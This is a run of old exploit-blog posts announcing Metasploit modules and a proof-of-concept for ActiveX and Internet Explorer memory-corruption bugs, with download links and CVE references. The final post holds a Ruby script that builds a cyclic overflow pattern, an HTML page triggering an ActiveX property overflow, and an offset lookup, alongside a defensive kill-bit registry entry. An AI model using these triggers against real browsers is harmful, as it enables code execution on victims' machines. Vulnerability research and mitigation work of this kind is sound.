Posted by Trancer on Apr 30 2009

And another new exploit module for Metasploit.
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to ‘DiskType’, an attacker can overrun a buffer and execute arbitrary code.

This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-)

Download roxio_cineplayer.rb.
Also on Metasploit.

References:
CVE-2007-1559
BID 23412
OSVDB 34779

Categories: Exploits, Metasploit


Posted by Trancer on Apr 30 2009

Wrote a new Metasploit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability.

This module exploits a heap-based memory corruption vulnerability in the Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use-after-free condition through the Src, Background and PackageXml properties.

This vulnerability was found by Elazar Broad, and apparently Autodesk is not going to fix this issue… Better flip on the kill bit for this one.

Download autodesk_idrop.rb.
Also on Metasploit.

References:
BID 34352
OSVDB 53265
milw0rm 8560
exploit-database #8560

Categories: Exploits, Metasploit


Posted by Trancer on Feb 24 2009

Here’s a proof-of-concept exploit for the Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability, in case you don’t use the Metasploit Framework and still want to test it.

Like the Metasploit module I wrote for it, it has been tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (without the 961260 patch).
Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplore.exe).

Download ms09-002.html.

Enjoy it.

Categories: Exploits


Posted by Trancer on Feb 20 2009

Just finished writing a quick Metasploit exploit module for the Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability.

Tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (without patch 961260, of course).
Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplore.exe).

Download ms09_002_object_delete.rb.

Was a fun one to play with ^_^

References:
MS09-002
CVE-2009-0075
BID 33627
OSVDB 51839
ZDI-09-011

Categories: Exploits, Metasploit


Posted by Trancer on Oct 14 2008

Wrote a new Metasploit exploit module for the HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow vulnerability.

This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to ‘ProgColor’, an attacker can overrun a buffer and execute arbitrary code.
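The trigger for this ‘ProgColor’ overflow and for the Roxio ‘DiskType’ overflow above has the same shape: a page instantiates the control by CLSID and assigns an oversized string to the property from script. The Ruby below is an added example, not code from either module or from Metasploit itself. It builds a cyclic pattern in the Aa0Aa1… scheme that Metasploit’s pattern_create uses, wraps it in the trigger page, recovers the overwrite offset from the value a debugger shows in EIP after the crash, and emits the kill-bit .reg entry that stops Internet Explorer from loading the same CLSID. The CLSID, the 2000-byte length and the EIP value used in the lookup are placeholders, not values from these posts.

```ruby
# Added example; not the modules' code. The CLSID is a placeholder: the real
# control's CLSID comes from its COM registration, not from the advisory text.
CLSID_PLACEHOLDER = '00000000-0000-0000-0000-000000000000'

# Cyclic pattern in the Aa0Aa1...Zz9 scheme used by Metasploit's pattern_create:
# every 4-byte window is unique within the first 20280 bytes, so the DWORD that
# lands in EIP identifies the exact offset of the overwrite.
def pattern_create(length)
  out = ''.dup
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out # requested length exceeds the 20280-byte period of the pattern
end

# Offset of a crash value inside the pattern. Accepts the 4 bytes as a string or
# as the DWORD a debugger displays (little-endian, e.g. EIP = 0x37694136).
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack('V') : value
  pattern.index(needle)
end

# The trigger page: instantiate the control and assign the long string to the
# vulnerable property through script, as a browser exploit page does.
def trigger_html(clsid, property, payload)
  js = payload.gsub('\\') { '\\\\' }.gsub('"') { '\\"' } # keep it a valid JS literal
  <<~HTML
    <html><body>
    <object classid="clsid:#{clsid}" id="target"></object>
    <script>
      var target = document.getElementById("target");
      target.#{property} = "#{js}";
    </script>
    </body></html>
  HTML
end

# Defender's side: the kill bit (Compatibility Flags 0x400) makes IE refuse to
# instantiate the CLSID even though the control stays installed.
KILLBIT = 0x400
def killbit_reg(clsid)
  <<~REG
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{#{clsid}}]
    "Compatibility Flags"=dword:#{format('%08x', KILLBIT)}
  REG
end

if __FILE__ == $0
  pat = pattern_create(2000) # the length is an assumption, not the real buffer size
  puts trigger_html(CLSID_PLACEHOLDER, 'DiskType', pat)
  # After the crash, feed the EIP value from the debugger back into the pattern:
  puts "EIP 0x37694136 -> offset #{pattern_offset(pat, 0x37694136)}" # 260
  puts killbit_reg(CLSID_PLACEHOLDER)
end
```

The .reg entry targets the 32-bit key path; on 64-bit Windows the 32-bit Internet Explorer reads the same subkey under SOFTWARE\Wow6432Node, so a control registered there needs the kill bit in both places. The kill bit only stops in-browser instantiation, so other hosts that can load the control are unaffected.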

Download hpmqc_progcolor.rb.
Also on Metasploit.

References:
CVE-2007-1819
BID 23239
OSVDB 34317
iDefense Labs
HP Security Bulletin

Categories: Exploits, Metasploit

